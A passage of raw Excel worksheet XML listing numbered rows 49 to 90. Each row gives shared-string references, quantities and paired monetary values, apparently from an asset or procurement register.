      <c r="I54" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J54" s="161">
        <v>11172</v>
      </c>
      <c r="K54" s="160">
        <v>3108</v>
      </c>
      <c r="L54" s="154"/>
      <c r="M54" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="2:13">
      <c r="B55" s="148">
        <v>49</v>
      </c>
      <c r="C55" s="251" t="s">
        <v>2553</v>
      </c>
      <c r="D55" s="252" t="s">
        <v>2554</v>
      </c>
      <c r="E55" s="154"/>
      <c r="F55" s="155"/>
      <c r="G55" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H55" s="152">
        <v>1</v>
      </c>
      <c r="I55" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J55" s="161">
        <v>3600</v>
      </c>
      <c r="K55" s="160">
        <v>403.2</v>
      </c>
      <c r="L55" s="154"/>
      <c r="M55" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="2:13">
      <c r="B56" s="148">
        <v>50</v>
      </c>
      <c r="C56" s="251" t="s">
        <v>2555</v>
      </c>
      <c r="D56" s="252" t="s">
        <v>2556</v>
      </c>
      <c r="E56" s="253" t="s">
        <v>2557</v>
      </c>
      <c r="F56" s="155"/>
      <c r="G56" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H56" s="152">
        <v>1</v>
      </c>
      <c r="I56" s="251" t="s">
        <v>2558</v>
      </c>
      <c r="J56" s="161">
        <v>9401.71</v>
      </c>
      <c r="K56" s="160">
        <v>2105.6</v>
      </c>
      <c r="L56" s="154"/>
      <c r="M56" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="2:13">
      <c r="B57" s="148">
        <v>51</v>
      </c>
      <c r="C57" s="249" t="s">
        <v>2559</v>
      </c>
      <c r="D57" s="250" t="s">
        <v>2560</v>
      </c>
      <c r="E57" s="255" t="s">
        <v>2561</v>
      </c>
      <c r="F57" s="151"/>
      <c r="G57" s="148" t="s">
        <v>507</v>
      </c>
      <c r="H57" s="148">
        <v>1</v>
      </c>
      <c r="I57" s="249" t="s">
        <v>2562</v>
      </c>
      <c r="J57" s="159">
        <v>5555.55</v>
      </c>
      <c r="K57" s="160">
        <v>0</v>
      </c>
      <c r="L57" s="150"/>
      <c r="M57" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="2:13">
      <c r="B58" s="148">
        <v>52</v>
      </c>
      <c r="C58" s="251" t="s">
        <v>2563</v>
      </c>
      <c r="D58" s="252" t="s">
        <v>2564</v>
      </c>
      <c r="E58" s="253" t="s">
        <v>2565</v>
      </c>
      <c r="F58" s="155"/>
      <c r="G58" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H58" s="152">
        <v>1</v>
      </c>
      <c r="I58" s="251" t="s">
        <v>2566</v>
      </c>
      <c r="J58" s="161">
        <v>91880.34</v>
      </c>
      <c r="K58" s="160">
        <v>38188.8</v>
      </c>
      <c r="L58" s="154" t="s">
        <v>2567</v>
      </c>
      <c r="M58" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="2:13">
      <c r="B59" s="148">
        <v>53</v>
      </c>
      <c r="C59" s="251" t="s">
        <v>2568</v>
      </c>
      <c r="D59" s="252" t="s">
        <v>2569</v>
      </c>
      <c r="E59" s="154" t="s">
        <v>2464</v>
      </c>
      <c r="F59" s="155"/>
      <c r="G59" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H59" s="152">
        <v>1</v>
      </c>
      <c r="I59" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J59" s="161">
        <v>14010</v>
      </c>
      <c r="K59" s="160">
        <v>3920</v>
      </c>
      <c r="L59" s="154"/>
      <c r="M59" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="2:13">
      <c r="B60" s="148">
        <v>54</v>
      </c>
      <c r="C60" s="251" t="s">
        <v>2570</v>
      </c>
      <c r="D60" s="252" t="s">
        <v>2571</v>
      </c>
      <c r="E60" s="154"/>
      <c r="F60" s="155"/>
      <c r="G60" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H60" s="152">
        <v>1</v>
      </c>
      <c r="I60" s="251" t="s">
        <v>2572</v>
      </c>
      <c r="J60" s="161">
        <v>6839</v>
      </c>
      <c r="K60" s="160">
        <v>1414.4</v>
      </c>
      <c r="L60" s="154"/>
      <c r="M60" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="61" customHeight="1" spans="2:13">
      <c r="B61" s="148">
        <v>55</v>
      </c>
      <c r="C61" s="251" t="s">
        <v>2573</v>
      </c>
      <c r="D61" s="252" t="s">
        <v>2574</v>
      </c>
      <c r="E61" s="154" t="s">
        <v>2575</v>
      </c>
      <c r="F61" s="155"/>
      <c r="G61" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H61" s="152">
        <v>1</v>
      </c>
      <c r="I61" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J61" s="161">
        <v>2761893.02</v>
      </c>
      <c r="K61" s="160">
        <v>1126814.4</v>
      </c>
      <c r="L61" s="154"/>
      <c r="M61" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="2:13">
      <c r="B62" s="148">
        <v>56</v>
      </c>
      <c r="C62" s="251" t="s">
        <v>2577</v>
      </c>
      <c r="D62" s="252" t="s">
        <v>2578</v>
      </c>
      <c r="E62" s="154"/>
      <c r="F62" s="155"/>
      <c r="G62" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H62" s="152">
        <v>224</v>
      </c>
      <c r="I62" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J62" s="161">
        <v>418735.06</v>
      </c>
      <c r="K62" s="160">
        <v>174179.2</v>
      </c>
      <c r="L62" s="154"/>
      <c r="M62" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="2:13">
      <c r="B63" s="148">
        <v>57</v>
      </c>
      <c r="C63" s="251" t="s">
        <v>2579</v>
      </c>
      <c r="D63" s="252" t="s">
        <v>2580</v>
      </c>
      <c r="E63" s="154"/>
      <c r="F63" s="155"/>
      <c r="G63" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H63" s="152">
        <v>1</v>
      </c>
      <c r="I63" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J63" s="161">
        <v>217864.95</v>
      </c>
      <c r="K63" s="160">
        <v>97574.4</v>
      </c>
      <c r="L63" s="154"/>
      <c r="M63" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="2:13">
      <c r="B64" s="148">
        <v>58</v>
      </c>
      <c r="C64" s="251" t="s">
        <v>2581</v>
      </c>
      <c r="D64" s="252" t="s">
        <v>2582</v>
      </c>
      <c r="E64" s="154"/>
      <c r="F64" s="155"/>
      <c r="G64" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H64" s="152">
        <v>1</v>
      </c>
      <c r="I64" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J64" s="161">
        <v>2912.62</v>
      </c>
      <c r="K64" s="160">
        <v>977.76</v>
      </c>
      <c r="L64" s="154"/>
      <c r="M64" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="2:13">
      <c r="B65" s="148">
        <v>59</v>
      </c>
      <c r="C65" s="249" t="s">
        <v>2583</v>
      </c>
      <c r="D65" s="250" t="s">
        <v>2426</v>
      </c>
      <c r="E65" s="150"/>
      <c r="F65" s="151"/>
      <c r="G65" s="148" t="s">
        <v>223</v>
      </c>
      <c r="H65" s="148">
        <v>1</v>
      </c>
      <c r="I65" s="249" t="s">
        <v>2576</v>
      </c>
      <c r="J65" s="159">
        <v>29697.12</v>
      </c>
      <c r="K65" s="160">
        <v>0</v>
      </c>
      <c r="L65" s="150"/>
      <c r="M65" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="2:13">
      <c r="B66" s="148">
        <v>60</v>
      </c>
      <c r="C66" s="251" t="s">
        <v>2584</v>
      </c>
      <c r="D66" s="252" t="s">
        <v>2542</v>
      </c>
      <c r="E66" s="154"/>
      <c r="F66" s="155"/>
      <c r="G66" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H66" s="152">
        <v>1</v>
      </c>
      <c r="I66" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J66" s="161">
        <v>96468.76</v>
      </c>
      <c r="K66" s="160">
        <v>40102.4</v>
      </c>
      <c r="L66" s="154"/>
      <c r="M66" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="2:13">
      <c r="B67" s="148">
        <v>61</v>
      </c>
      <c r="C67" s="251" t="s">
        <v>2585</v>
      </c>
      <c r="D67" s="252" t="s">
        <v>2586</v>
      </c>
      <c r="E67" s="154"/>
      <c r="F67" s="155"/>
      <c r="G67" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H67" s="152">
        <v>1</v>
      </c>
      <c r="I67" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J67" s="161">
        <v>89062.15</v>
      </c>
      <c r="K67" s="160">
        <v>32752</v>
      </c>
      <c r="L67" s="154"/>
      <c r="M67" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="2:13">
      <c r="B68" s="148">
        <v>62</v>
      </c>
      <c r="C68" s="251" t="s">
        <v>2587</v>
      </c>
      <c r="D68" s="252" t="s">
        <v>2588</v>
      </c>
      <c r="E68" s="253" t="s">
        <v>2589</v>
      </c>
      <c r="F68" s="155"/>
      <c r="G68" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H68" s="152">
        <v>1</v>
      </c>
      <c r="I68" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J68" s="161">
        <v>23306.62</v>
      </c>
      <c r="K68" s="160">
        <v>8574.4</v>
      </c>
      <c r="L68" s="154"/>
      <c r="M68" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="2:13">
      <c r="B69" s="148">
        <v>63</v>
      </c>
      <c r="C69" s="251" t="s">
        <v>2590</v>
      </c>
      <c r="D69" s="252" t="s">
        <v>2485</v>
      </c>
      <c r="E69" s="253" t="s">
        <v>2591</v>
      </c>
      <c r="F69" s="155"/>
      <c r="G69" s="152" t="s">
        <v>1697</v>
      </c>
      <c r="H69" s="152">
        <v>1</v>
      </c>
      <c r="I69" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J69" s="161">
        <v>450262.67</v>
      </c>
      <c r="K69" s="160">
        <v>187283.2</v>
      </c>
      <c r="L69" s="154"/>
      <c r="M69" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="2:13">
      <c r="B70" s="148">
        <v>64</v>
      </c>
      <c r="C70" s="251" t="s">
        <v>2592</v>
      </c>
      <c r="D70" s="252" t="s">
        <v>2593</v>
      </c>
      <c r="E70" s="253" t="s">
        <v>2594</v>
      </c>
      <c r="F70" s="155"/>
      <c r="G70" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H70" s="152">
        <v>2</v>
      </c>
      <c r="I70" s="251" t="s">
        <v>2576</v>
      </c>
      <c r="J70" s="161">
        <v>79371.55</v>
      </c>
      <c r="K70" s="160">
        <v>26644.8</v>
      </c>
      <c r="L70" s="154" t="s">
        <v>2595</v>
      </c>
      <c r="M70" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="2:13">
      <c r="B71" s="148">
        <v>65</v>
      </c>
      <c r="C71" s="251" t="s">
        <v>2596</v>
      </c>
      <c r="D71" s="252" t="s">
        <v>2597</v>
      </c>
      <c r="E71" s="253" t="s">
        <v>2598</v>
      </c>
      <c r="F71" s="155"/>
      <c r="G71" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H71" s="152">
        <v>1</v>
      </c>
      <c r="I71" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J71" s="161">
        <v>88832.48</v>
      </c>
      <c r="K71" s="160">
        <v>29836.8</v>
      </c>
      <c r="L71" s="154" t="s">
        <v>2600</v>
      </c>
      <c r="M71" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="2:13">
      <c r="B72" s="148">
        <v>66</v>
      </c>
      <c r="C72" s="251" t="s">
        <v>2601</v>
      </c>
      <c r="D72" s="252" t="s">
        <v>2597</v>
      </c>
      <c r="E72" s="253" t="s">
        <v>2602</v>
      </c>
      <c r="F72" s="155"/>
      <c r="G72" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H72" s="152">
        <v>1</v>
      </c>
      <c r="I72" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J72" s="161">
        <v>87048.46</v>
      </c>
      <c r="K72" s="160">
        <v>29232</v>
      </c>
      <c r="L72" s="154" t="s">
        <v>2603</v>
      </c>
      <c r="M72" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="2:13">
      <c r="B73" s="148">
        <v>67</v>
      </c>
      <c r="C73" s="251" t="s">
        <v>2604</v>
      </c>
      <c r="D73" s="252" t="s">
        <v>2605</v>
      </c>
      <c r="E73" s="154"/>
      <c r="F73" s="155"/>
      <c r="G73" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H73" s="152">
        <v>1</v>
      </c>
      <c r="I73" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J73" s="161">
        <v>97343.42</v>
      </c>
      <c r="K73" s="160">
        <v>43590.4</v>
      </c>
      <c r="L73" s="154"/>
      <c r="M73" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="2:13">
      <c r="B74" s="148">
        <v>68</v>
      </c>
      <c r="C74" s="251" t="s">
        <v>2606</v>
      </c>
      <c r="D74" s="252" t="s">
        <v>2607</v>
      </c>
      <c r="E74" s="253" t="s">
        <v>2608</v>
      </c>
      <c r="F74" s="155"/>
      <c r="G74" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H74" s="152">
        <v>1</v>
      </c>
      <c r="I74" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J74" s="161">
        <v>242416</v>
      </c>
      <c r="K74" s="160">
        <v>100838.4</v>
      </c>
      <c r="L74" s="154"/>
      <c r="M74" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="2:13">
      <c r="B75" s="148">
        <v>69</v>
      </c>
      <c r="C75" s="251" t="s">
        <v>2609</v>
      </c>
      <c r="D75" s="252" t="s">
        <v>2460</v>
      </c>
      <c r="E75" s="253" t="s">
        <v>2610</v>
      </c>
      <c r="F75" s="155"/>
      <c r="G75" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H75" s="152">
        <v>1</v>
      </c>
      <c r="I75" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J75" s="161">
        <v>121502.56</v>
      </c>
      <c r="K75" s="160">
        <v>50544</v>
      </c>
      <c r="L75" s="154"/>
      <c r="M75" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="76" customHeight="1" spans="2:13">
      <c r="B76" s="148">
        <v>70</v>
      </c>
      <c r="C76" s="251" t="s">
        <v>2611</v>
      </c>
      <c r="D76" s="252" t="s">
        <v>2612</v>
      </c>
      <c r="E76" s="253" t="s">
        <v>2613</v>
      </c>
      <c r="F76" s="155"/>
      <c r="G76" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H76" s="152">
        <v>1</v>
      </c>
      <c r="I76" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J76" s="161">
        <v>292332.7</v>
      </c>
      <c r="K76" s="160">
        <v>121596.8</v>
      </c>
      <c r="L76" s="154" t="s">
        <v>2614</v>
      </c>
      <c r="M76" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="2:13">
      <c r="B77" s="148">
        <v>71</v>
      </c>
      <c r="C77" s="251" t="s">
        <v>2615</v>
      </c>
      <c r="D77" s="252" t="s">
        <v>2616</v>
      </c>
      <c r="E77" s="154" t="s">
        <v>2518</v>
      </c>
      <c r="F77" s="155"/>
      <c r="G77" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H77" s="152">
        <v>1</v>
      </c>
      <c r="I77" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J77" s="161">
        <v>126000.69</v>
      </c>
      <c r="K77" s="160">
        <v>42336</v>
      </c>
      <c r="L77" s="154"/>
      <c r="M77" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="2:13">
      <c r="B78" s="148">
        <v>72</v>
      </c>
      <c r="C78" s="251" t="s">
        <v>2617</v>
      </c>
      <c r="D78" s="252" t="s">
        <v>2618</v>
      </c>
      <c r="E78" s="253" t="s">
        <v>2619</v>
      </c>
      <c r="F78" s="155"/>
      <c r="G78" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H78" s="152">
        <v>2</v>
      </c>
      <c r="I78" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J78" s="161">
        <v>142905.98</v>
      </c>
      <c r="K78" s="160">
        <v>48014.4</v>
      </c>
      <c r="L78" s="154"/>
      <c r="M78" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="2:13">
      <c r="B79" s="148">
        <v>73</v>
      </c>
      <c r="C79" s="249" t="s">
        <v>2620</v>
      </c>
      <c r="D79" s="250" t="s">
        <v>2527</v>
      </c>
      <c r="E79" s="154" t="s">
        <v>2621</v>
      </c>
      <c r="F79" s="155"/>
      <c r="G79" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H79" s="152">
        <v>1</v>
      </c>
      <c r="I79" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J79" s="161">
        <v>133333.33</v>
      </c>
      <c r="K79" s="160">
        <v>55452.8</v>
      </c>
      <c r="L79" s="154"/>
      <c r="M79" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="2:13">
      <c r="B80" s="148">
        <v>74</v>
      </c>
      <c r="C80" s="251" t="s">
        <v>2622</v>
      </c>
      <c r="D80" s="252" t="s">
        <v>2623</v>
      </c>
      <c r="E80" s="154" t="s">
        <v>2624</v>
      </c>
      <c r="F80" s="155"/>
      <c r="G80" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H80" s="152">
        <v>6</v>
      </c>
      <c r="I80" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J80" s="161">
        <v>1152742.47</v>
      </c>
      <c r="K80" s="160">
        <v>516409.6</v>
      </c>
      <c r="L80" s="154"/>
      <c r="M80" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="2:13">
      <c r="B81" s="148">
        <v>75</v>
      </c>
      <c r="C81" s="251" t="s">
        <v>2625</v>
      </c>
      <c r="D81" s="252" t="s">
        <v>2626</v>
      </c>
      <c r="E81" s="253" t="s">
        <v>2627</v>
      </c>
      <c r="F81" s="155"/>
      <c r="G81" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H81" s="152">
        <v>1</v>
      </c>
      <c r="I81" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J81" s="161">
        <v>259302.18</v>
      </c>
      <c r="K81" s="160">
        <v>116166.4</v>
      </c>
      <c r="L81" s="154"/>
      <c r="M81" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="2:13">
      <c r="B82" s="148">
        <v>76</v>
      </c>
      <c r="C82" s="251" t="s">
        <v>2628</v>
      </c>
      <c r="D82" s="252" t="s">
        <v>681</v>
      </c>
      <c r="E82" s="253" t="s">
        <v>2629</v>
      </c>
      <c r="F82" s="155"/>
      <c r="G82" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H82" s="152">
        <v>1</v>
      </c>
      <c r="I82" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J82" s="161">
        <v>11452.99</v>
      </c>
      <c r="K82" s="160">
        <v>3847.2</v>
      </c>
      <c r="L82" s="154"/>
      <c r="M82" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="2:13">
      <c r="B83" s="148">
        <v>77</v>
      </c>
      <c r="C83" s="251" t="s">
        <v>2630</v>
      </c>
      <c r="D83" s="252" t="s">
        <v>2631</v>
      </c>
      <c r="E83" s="154"/>
      <c r="F83" s="155"/>
      <c r="G83" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H83" s="164">
        <v>6</v>
      </c>
      <c r="I83" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J83" s="161">
        <v>16649.58</v>
      </c>
      <c r="K83" s="160">
        <v>5577.6</v>
      </c>
      <c r="L83" s="154"/>
      <c r="M83" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="2:13">
      <c r="B84" s="148">
        <v>78</v>
      </c>
      <c r="C84" s="251" t="s">
        <v>2632</v>
      </c>
      <c r="D84" s="252" t="s">
        <v>2631</v>
      </c>
      <c r="E84" s="154"/>
      <c r="F84" s="155"/>
      <c r="G84" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H84" s="165"/>
      <c r="I84" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J84" s="161">
        <v>19145.3</v>
      </c>
      <c r="K84" s="160">
        <v>6417.6</v>
      </c>
      <c r="L84" s="154"/>
      <c r="M84" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="2:13">
      <c r="B85" s="148">
        <v>79</v>
      </c>
      <c r="C85" s="251" t="s">
        <v>2633</v>
      </c>
      <c r="D85" s="252" t="s">
        <v>2634</v>
      </c>
      <c r="E85" s="253" t="s">
        <v>2635</v>
      </c>
      <c r="F85" s="155"/>
      <c r="G85" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H85" s="152">
        <v>1</v>
      </c>
      <c r="I85" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J85" s="161">
        <v>42339.78</v>
      </c>
      <c r="K85" s="160">
        <v>14212.8</v>
      </c>
      <c r="L85" s="154"/>
      <c r="M85" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="2:13">
      <c r="B86" s="148">
        <v>80</v>
      </c>
      <c r="C86" s="251" t="s">
        <v>2636</v>
      </c>
      <c r="D86" s="252" t="s">
        <v>2634</v>
      </c>
      <c r="E86" s="253" t="s">
        <v>2637</v>
      </c>
      <c r="F86" s="155"/>
      <c r="G86" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H86" s="152">
        <v>1</v>
      </c>
      <c r="I86" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J86" s="161">
        <v>142689.8</v>
      </c>
      <c r="K86" s="160">
        <v>47913.6</v>
      </c>
      <c r="L86" s="154"/>
      <c r="M86" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="2:13">
      <c r="B87" s="148">
        <v>81</v>
      </c>
      <c r="C87" s="251" t="s">
        <v>2638</v>
      </c>
      <c r="D87" s="252" t="s">
        <v>2634</v>
      </c>
      <c r="E87" s="253" t="s">
        <v>2639</v>
      </c>
      <c r="F87" s="155"/>
      <c r="G87" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H87" s="152">
        <v>1</v>
      </c>
      <c r="I87" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J87" s="161">
        <v>35907.68</v>
      </c>
      <c r="K87" s="160">
        <v>12062.4</v>
      </c>
      <c r="L87" s="154"/>
      <c r="M87" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="2:13">
      <c r="B88" s="148">
        <v>82</v>
      </c>
      <c r="C88" s="251" t="s">
        <v>2640</v>
      </c>
      <c r="D88" s="252" t="s">
        <v>2641</v>
      </c>
      <c r="E88" s="253" t="s">
        <v>2642</v>
      </c>
      <c r="F88" s="155"/>
      <c r="G88" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H88" s="152">
        <v>1</v>
      </c>
      <c r="I88" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J88" s="161">
        <v>164410.35</v>
      </c>
      <c r="K88" s="160">
        <v>73651.2</v>
      </c>
      <c r="L88" s="154"/>
      <c r="M88" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="89" customHeight="1" spans="2:13">
      <c r="B89" s="148">
        <v>83</v>
      </c>
      <c r="C89" s="251" t="s">
        <v>2643</v>
      </c>
      <c r="D89" s="252" t="s">
        <v>2644</v>
      </c>
      <c r="E89" s="253" t="s">
        <v>2645</v>
      </c>
      <c r="F89" s="155"/>
      <c r="G89" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H89" s="152">
        <v>1</v>
      </c>
      <c r="I89" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J89" s="161">
        <v>58545.3</v>
      </c>
      <c r="K89" s="160">
        <v>19656</v>
      </c>
      <c r="L89" s="154"/>
      <c r="M89" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="90" customHeight="1" spans="2:13">
      <c r="B90" s="148">
        <v>84</v>
      </c>
      <c r="C90" s="251" t="s">
        <v>2646</v>
      </c>
      <c r="D90" s="252" t="s">
        <v>2647</v>
      </c>
      <c r="E90" s="154" t="s">
        <v>2648</v>
      </c>
      <c r="F90" s="155"/>
      <c r="G90" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H90" s="152">
        <v>4</v>
      </c>
      <c r="I90" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J90" s="161">
        <v>52193.9</v>
      </c>
      <c r="K90" s="160">
        <v>17505.6</v>
      </c>
      <c r="L90" s="154"/>
      <c r="M90" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="2:13">
      <c r="B91" s="148">
        <v>85</v>
      </c>
      <c r="C91" s="251" t="s">
        <v>2649</v>
      </c>
      <c r="D91" s="252" t="s">
        <v>1324</v>
      </c>
      <c r="E91" s="253" t="s">
        <v>2650</v>
      </c>
      <c r="F91" s="155"/>
      <c r="G91" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H91" s="152">
        <v>1</v>
      </c>
      <c r="I91" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J91" s="161">
        <v>19259.92</v>
      </c>
      <c r="K91" s="160">
        <v>6451.2</v>
      </c>
      <c r="L91" s="154"/>
      <c r="M91" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="2:13">
      <c r="B92" s="148">
        <v>86</v>
      </c>
      <c r="C92" s="251" t="s">
        <v>2651</v>
      </c>
      <c r="D92" s="252" t="s">
        <v>2652</v>
      </c>
      <c r="E92" s="154"/>
      <c r="F92" s="155"/>
      <c r="G92" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H92" s="152">
        <v>1</v>
      </c>
      <c r="I92" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J92" s="161">
        <v>25641.03</v>
      </c>
      <c r="K92" s="160">
        <v>10649.6</v>
      </c>
      <c r="L92" s="154"/>
      <c r="M92" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="2:13">
      <c r="B93" s="148">
        <v>87</v>
      </c>
      <c r="C93" s="251" t="s">
        <v>2653</v>
      </c>
      <c r="D93" s="252" t="s">
        <v>2654</v>
      </c>
      <c r="E93" s="253" t="s">
        <v>2655</v>
      </c>
      <c r="F93" s="155"/>
      <c r="G93" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H93" s="152">
        <v>1</v>
      </c>
      <c r="I93" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J93" s="161">
        <v>46617.13</v>
      </c>
      <c r="K93" s="160">
        <v>19385.6</v>
      </c>
      <c r="L93" s="154"/>
      <c r="M93" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="2:13">
      <c r="B94" s="148">
        <v>88</v>
      </c>
      <c r="C94" s="251" t="s">
        <v>2656</v>
      </c>
      <c r="D94" s="252" t="s">
        <v>2657</v>
      </c>
      <c r="E94" s="253" t="s">
        <v>2658</v>
      </c>
      <c r="F94" s="155"/>
      <c r="G94" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H94" s="152">
        <v>1</v>
      </c>
      <c r="I94" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J94" s="161">
        <v>244151.39</v>
      </c>
      <c r="K94" s="160">
        <v>101545.6</v>
      </c>
      <c r="L94" s="154"/>
      <c r="M94" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="2:13">
      <c r="B95" s="148">
        <v>89</v>
      </c>
      <c r="C95" s="251" t="s">
        <v>2659</v>
      </c>
      <c r="D95" s="252" t="s">
        <v>2660</v>
      </c>
      <c r="E95" s="253" t="s">
        <v>2661</v>
      </c>
      <c r="F95" s="155"/>
      <c r="G95" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H95" s="152">
        <v>1</v>
      </c>
      <c r="I95" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J95" s="161">
        <v>312101.2</v>
      </c>
      <c r="K95" s="160">
        <v>129833.6</v>
      </c>
      <c r="L95" s="154"/>
      <c r="M95" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="2:13">
      <c r="B96" s="148">
        <v>90</v>
      </c>
      <c r="C96" s="251" t="s">
        <v>2662</v>
      </c>
      <c r="D96" s="252" t="s">
        <v>2663</v>
      </c>
      <c r="E96" s="253" t="s">
        <v>2664</v>
      </c>
      <c r="F96" s="155" t="s">
        <v>2665</v>
